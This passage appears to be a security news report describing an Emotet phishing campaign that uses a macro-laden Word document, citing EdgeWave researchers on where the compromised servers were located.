After clicking on the order button, it downloads Word document named order_details.doc. Once the file is opened, it will tell you to Enable Content in order to properly view.
When a user Enable Content button, it executes a PowerShell command that downloads and execute the Emotet banking Trojan on the victim’s computer.
According to the researchers at EdgeWave the compromised servers used in this campaign are located in Columbia, Indonesia, and the United States of America.
“Interestingly, these other servers are in Houston and Lansing. Playing Dora the Explorer for a moment, we’ve encountered a compromised email server in Columbia sending phishing email with a link to a server in Indonesia that downloads malware which then contacts compromised servers in the United States. The holidays are truly global!”